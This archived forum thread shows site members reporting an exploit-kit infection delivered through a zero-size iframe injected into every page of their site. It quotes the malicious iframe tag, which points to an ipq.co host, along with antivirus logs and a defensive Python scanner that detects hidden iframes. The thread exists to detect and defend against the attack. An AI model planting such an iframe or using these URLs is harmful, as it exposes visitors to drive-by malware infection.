
Website Infection? [Resolved]


Slammer64


Posted

Using Norton Internet Security, and I'm getting the same warnings. Also, I'm running Firefox 17.0.1, with Adblock Plus 2.2.1; the ads aren't displayed, but it seems that didn't do anything to stop the intrusion attempt.

 

Additionally, I'm no expert, but, if it'd be of any help to the admins... Here are the logs from my system.

 

 

 

Category: Intrusion Prevention
Date & Time: 2012-12-11 20:38:58
Risk: High
Activity: An intrusion attempt by fg34df.ipq.co was blocked.
Status: Blocked
Recommended Action: No Action Required
IPS Alert Name: Web Attack: Exploit Toolkit Website 5
Default Action: No Action Required
Action Taken: No Action Required
Attacking Computer: "fg34df.ipq.co (178.162.132.202, 34511)"
Attacker URL: fg34df.ipq.co:34511/t/9cf02f7aec1af4ea55a734c7074d4e91
Source Address: 178.162.132.202 (178.162.132.202)
Traffic Description: "TCP, Port 34511"

Network traffic from fg34df.ipq.co:34511/t/9cf02f7aec1af4ea55a734c7074d4e91 matches the signature of a known attack. The attack was resulted from \DEVICE\HARDDISKVOLUME1\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE.

 

 

 

 

 

Category: Intrusion Prevention
Date & Time: 2012-12-11 20:38:58
Risk: High
Activity: An intrusion attempt by fg34df.ipq.co was blocked.
Status: Blocked
Recommended Action: No Action Required
IPS Alert Name: Web Attack: Malicious Toolkit Website 9
Default Action: No Action Required
Action Taken: No Action Required
Attacking Computer: "fg34df.ipq.co (178.162.132.202, 34511)"
Attacker URL: fg34df.ipq.co:34511/t/9cf02f7aec1af4ea55a734c7074d4e91
Source Address: 178.162.132.202 (178.162.132.202)
Traffic Description: "TCP, Port 34511"

Network traffic from fg34df.ipq.co:34511/t/9cf02f7aec1af4ea55a734c7074d4e91 matches the signature of a known attack. The attack was resulted from \DEVICE\HARDDISKVOLUME1\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE.

 

 

 

Also: It is -not- asking me to run Java. However, I don't know if that is because it blocked it automatically, if I manually blocked it at some point in the past...or if I allowed it previously, and it still had that saved. >>

 

Also also - I'm not getting warnings on every page, but that likely is due to my antivirus - there's an entry in my security history stating that it automatically blocked the IP address 178.162.132.202 for half an hour - it looks, to me at least, like that is where the attacks are originating from.

Posted

I did allow Java to run and got infected with a trojan. Search for these two files on your system drive: dettarisatqo.exe, 1JFUWEIF.EXE or any other exe or dll that's created/modified today. Also, take a look at the registry and start up programs and check if there's anything unusual that's set to run at start up.

 

I use Chrome with AdBlock and MS Security Essentials (which is apparently nothing but a piece of shit) and still got infected.

 

Also, download and run PeerBlock to prevent the trojan from accessing wherever it tries to contact, and also check if there's any suspicious connection activity.

Posted

IPQ.CO is the "tinyurl of the DNS world".

 

http://johnleach.co.uk/words/646/ipq-co-intstant-dns-records

 

Probably attackers are using their service to send malicious adverts, I guess with IFRAME scripts to deliver malware.

 

Also found some reports on ipq.co.

 

http://www.avgthreatlabs.com/sitereports/domain/ipq.co

http://siteadvisor.es/sites/ipq.co/msgpage

http://www.net-security.org/malware_news.php?id=1657

Posted

Time of Alert - Every time I load a page on this site O_O (Think it started yesterday, but I might not have been paying attention... it's also possible that I just hadn't visited the site since the offending dealie turned up.)

The page you encountered it on - see above

The name/type of the virus - "exploit nuclear exploit kit (type 1945)"

 

Checked the page sources, and it's the src of the first iframe in the header that's being reported.

Posted

- Time of Alert: today, every page I've read on LL so far.

- The page you encountered it on: see above.

- The name of the virus/Virus type: see below

Detection log from Kaspersky:

 

Firefox fg34df.ipq

Detected: HEUR:Trojan.Script.Generic

hxxp://fg34df.ipq.co:34511/t/9cf02f7aec1af4ea55a734c7074d4e91//

 

Putting the url above into Kaspersky's Anti-Banner (which apparently blocks whole websites) settings seems to work. I'm not getting warning messages every LL page load now. edit: modified the url so it wasn't clickable.

Posted

Getting warnings from Norton, it's stomping it but there's definitely a rootkit coming from somewhere.

 

Happens occasionally when I switch a page or come to the site.

 

I think it may be malicious code in some of the ads.

 

I have the IP address of where the attack originated.

 

[attachment=20020]

Posted

Thank you Ashal. And I wish to apologize to my fellow board members if I seemed a touch grumpy, not to make excuses but I've been fighting with an Asterisk server that didn't want to do the right thing, had to break out my baseball bat...

Posted

Thanks ashal.

 

Whatever loss of safety that I had felt by this attack, has been restored by your timely response.

 

EDIT: I'm deleting my earlier attachment... I realized I probably shouldn't leave pictures of how my antivirus is configured along with my IP address just laying around.

Posted

Was gone, but it seems to be back, I've had a couple of alerts in the last half hour. Same type, similar location - src of the first iframe in the body, line 80.

Posted

Well, our problems just got worse and we have now been reported as an attack site. This needs to be sorted out; we have pretty much been flagged up everywhere now.

 

[attachment image: post-18568-13597881529123_thumb.jpg]

Posted

You should be ok with them but you will only be about 95% safe from infection. The image above is only saying that we have been attacked and not currently giving malware warnings.

 

Just be on guard and don't click on any dodgy links. I am creating a guide to help users with this sort of thing as I feel it is needed now after recent events. If you want to be really safe, have two anti-virus programs.

 

Right now I have a big red strip across my screen and it is not filling me with confidence.

Posted

Which pages?

 

It's on every page I've got open right now, though it's not at line 80 on each page, that was a dumb assumption on my part. The line in question is in the spoiler.

 

<iframe width="0" height="0" frameborder="0" src="http://reftuer.ipq.co:34511/t/03a0868382d7f3f5b9776f81ff92f433">

 

Posted

I received that malware warning, too.

I hope for the best, to keep that forum online.

 

I'll use Sandboxie until this incident has been solved.

Posted

I am getting Chrome warnings.

 

Did a bit of research. As has been said previously, it's because of an iframe embedded in all pages that points to some URL at reftuer.ipq.co. It seems that host is labeled as dangerous by Google.

 

Checked that URL and it's not working at the moment; however, it may work at any time.

I've added *ipq.co* to the AdBlock settings to prevent the browser from executing stuff from there. That host is the same as the previous attack that I saw in this thread.

 

About the Java popup, just some advice: never allow Java to run from those popups if you are not sure why the popup shows. You can always refresh later and say yes if you find it's harmless.
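The posts above describe the injection as a zero-size iframe in every page pointing at an ipq.co subdomain on a non-standard port, and one poster blocks *ipq.co* in AdBlock. As an added example that is not part of this thread, the following Python script is the kind of check a site admin could run over saved page source to find such frames: it parses the HTML, flags any iframe that is hidden (zero size or hidden via CSS), loads from a watched domain, or uses an unusual port, and prints defanged indicators (hxxp, [.]) so they can be shared without being clickable, as the Kaspersky poster did by hand. The sample page, the watchlist and all function names are constructed for the example; the iframe source inside it is the one quoted in the thread.

```python
"""Find hidden or suspicious iframes in saved HTML and report defanged IoCs.

Added example, not code from the forum thread. The watchlist and sample
page are constructed; the first iframe is the tag quoted in the thread.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit, urlunsplit

# Constructed watchlist: apex domains whose subdomains should be flagged.
WATCHED_DOMAINS = {"ipq.co"}

# Constructed sample page: line 3 carries the injected frame, line 5 a
# normal-looking video embed that must not be flagged.
SAMPLE_PAGE = """<html><head><title>Forum</title></head>
<body>
<iframe width="0" height="0" frameborder="0" src="http://reftuer.ipq.co:34511/t/03a0868382d7f3f5b9776f81ff92f433"></iframe>
<p>Welcome to the board</p>
<iframe width="560" height="315" src="https://www.youtube.com/embed/example"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes and source line."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            line, _col = self.getpos()  # 1-based line of the tag
            self.iframes.append({"line": line, "attrs": dict(attrs)})


def _is_zero(value):
    """True for width/height values such as '0', '0px' or '0%'."""
    if value is None:
        return False
    digits = value.strip().rstrip("px%").strip()
    return digits.isdigit() and int(digits) == 0


def _normalise_src(src):
    """Give scheme-less or protocol-relative src values a scheme so urlsplit
    does not mistake 'host:port' for a URL scheme."""
    if src.startswith("//"):
        return "http:" + src
    if "://" not in src:
        return "http://" + src
    return src


def classify_iframe(attrs):
    """Return the reasons this iframe looks like an injection, or [] if none."""
    reasons = []
    if _is_zero(attrs.get("width")) and _is_zero(attrs.get("height")):
        reasons.append("zero-size frame")
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        reasons.append("hidden via CSS")
    src = attrs.get("src") or ""
    if src:
        parts = urlsplit(_normalise_src(src))
        host = (parts.hostname or "").lower()
        if any(host == d or host.endswith("." + d) for d in WATCHED_DOMAINS):
            reasons.append(f"watched domain {host}")
        if parts.port not in (None, 80, 443):
            reasons.append(f"non-standard port {parts.port}")
    return reasons


def defang(url):
    """Make an indicator non-clickable for sharing: http -> hxxp, '.' -> '[.]' in the host."""
    parts = urlsplit(_normalise_src(url))
    scheme = parts.scheme.replace("http", "hxxp")
    netloc = parts.netloc.replace(".", "[.]")  # port carries no dots
    return urlunsplit((scheme, netloc, parts.path, parts.query, parts.fragment))


def scan_html(html):
    """Return one finding per suspicious iframe: line, src and reasons."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for frame in collector.iframes:
        reasons = classify_iframe(frame["attrs"])
        if reasons:
            findings.append({"line": frame["line"],
                             "src": frame["attrs"].get("src") or "",
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(f"line {finding['line']}: {defang(finding['src'])}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

Run it against a page saved with "view source" (or fetched with curl on a machine you do not mind exposing) rather than the live site in a browser; the point is to locate where in the template the tag is being injected, which the thread's posters had to do by reading source by eye. The watched-domain and port checks are independent of the hidden-frame check, so a frame on a normal port from a watched domain is still reported.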

Archived

This topic is now archived and is closed to further replies.
